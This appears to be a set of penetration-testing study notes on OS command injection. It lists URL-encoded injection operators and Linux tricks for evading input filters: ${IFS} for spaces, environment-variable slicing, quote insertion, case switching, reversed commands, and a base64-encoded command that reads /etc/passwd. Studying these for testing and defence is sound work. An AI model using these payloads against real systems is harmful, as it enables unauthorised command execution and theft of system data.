Notes
Injection Operators
; : %3b
\n : %0a
& : %26
| : %7c
&& : %26%26
|| : %7c%7c
`` : %60%60
$() : %24%28%29
Linux
Filtered Character Bypass
printenv
Spaces
%09
Using tabs instead of spaces
${IFS}
Will be replaced with a space and a tab. Cannot be used in sub-shells (i.e. $()
)
{ls,-la}
Commas will be replaced with spaces
${PATH:0:1}
Will be replaced with /
${LS_COLORS:10:1}
Will be replaced with ;
$(tr '!-}' '"-~'<<<[)
Shift character by one ([
-> \
)
Blacklisted Command Bypass
Character Insertion
'
or "
Total must be eve
$@
or \
Linux only
Case Manipulation
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")
Execute command regardless of cases
$(a="WhOaMi";printf %s "${a,,}")
Another variation of the technique
Reversed Commands
echo 'whoami' | rev
Reverse a string
$(rev<<<'imaohw')
Execute reversed command
Encoded Commands
echo -n 'cat /etc/passwd | grep 33' | base64
Encode a string with base64
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
Execute b64 encoded string
Last updated